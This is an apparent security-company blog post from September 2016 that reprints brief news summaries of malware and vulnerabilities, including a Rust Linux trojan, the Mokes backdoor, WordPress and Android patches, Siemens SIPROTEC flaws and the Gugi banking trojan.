Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On September 08, 2016

September 9, Softpedia – (International) New Linux trojan discovered coded in Mozilla’s Rust language. Dr. Web security researchers discovered a new trojan coded in Mozilla’s Rust programming language was targeting Linux-based platforms and found that an attacker in control of an Internet Relay Chat (IRC) channel can send a message to the channel’s public chat that forces all connected bots to parse the message and execute the malicious action. The researchers believe this is a testing version of the malware as the trojan infects victims and gathers information about the device’s local system and sends it to its command and control (C&C) center. Source

September 8, SecurityWeek – (International) DropboxCache cross-platform backdoor targets OS X. Kaspersky Lab security researchers discovered that the DropboxCache, known as Mokes.A or Backdoor.OSX.Mokes now targets Apple Mac operating system (OS) X devices and establishes a connection to the command and control (C&C) server using Hypertext Transfer Protocol (HTTP) on Transmission Control Protocol (TCP) port 80 in order to set up its backdoor features on an infected device, which include capturing audio, monitoring removable storage, scanning the file system for Microsoft Office documents, as well as creating a series of temp files with the collected data when the C&C server is not available, among other features. Researchers warned the malware’s operator can execute arbitrary commands on the infected system and define own file filters to improve its monitoring of the file system. Source

September 8, Softpedia – (International) WordPress 4.6.1 security update is out, time to update peeps. WordPress released version 4.6.1 of its WordPress Content Management System (CMS) resolving a path traversal vulnerability and a cross-site scripting (XSS) flaw affecting the admin panel that can be exploited via image metadata and allow a malicious actor to take over the affected Website. The update also patches 15 other bugs related to the underlying CMS codebase. Source

September 8, Help Net Security – (International) Flaws in Network Management Systems open enterprise networks to attacks. Rapid7 researchers and an independent researcher discovered over 12 vulnerabilities plaguing 9 different Network Management Systems (NMSs) products that could be exploited via cross-site scripting (XSS) attacks over Simple Network Management Protocol (SNMP) agent-provided data, which could allow a local attacker to add a malicious device to the network, XSS attacks over SNMP trap alert messages, and format string processing on the NMS Web management console that can be carried out via specially crafted trap alert messages. Researchers reported that all the flaws have received patches. Source

September 7, SecurityWeek – (International) Google patches QuadRooter, other critical Android vulnerabilities. Google released its September 2016 Android Security Bulletin resolving 55 vulnerabilities, including 2 critical remote code execution (RCE) flaws in LibUtils and Mediaserver, a high risk RCE in MediaMuxer, and 2 issues in QuadRooter that impacted over 900 million Android devices using Qualcomm chipsets, among other vulnerabilities. Source

September 7, SecurityWeek – (International) Siemens fixes several flaws in SIPROTEC products. Siemens released firmware updates addressing vulnerabilities in its SIPROTEC 4 and SIPROTEC Compact devices after Kaspersky Lab researchers found the devices were plagued with a flaw that an attacker with network access could exploit to bypass authentication mechanisms and carry out administrative operations, and a flaw that could allow an attacker with network access to perform those actions while a legitimate user is logged in to the Web interface. Siemens advised customers to use network segmentation, virtual private networks (VPNs), and firewalls to protect their systems against attacks. Source

September 7, SecurityWeek – (International) Gugi banking trojan can bypass Android 6 protection. Kaspersky security researchers discovered a variant of the Gugi mobile banking trojan can bypass two security features in Google’s Android 6.0, including the permission-based app overlays and the dynamic permission requirement for dangerous in-app activities like calls or short message service (SMS) in order to overlay applications and steal mobile banking credentials from its victims, and found the trojan is being distributed via SMS spam that tricks victims into accessing phishing Websites, which downloads the malware onto the device. Researchers advised users to reboot the infected device in safe mood and attempt to uninstall the trojan.  Source

 Above Reprinted from the USDHS Daily Open Source Infrastructure Report 

Nancy Rand

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.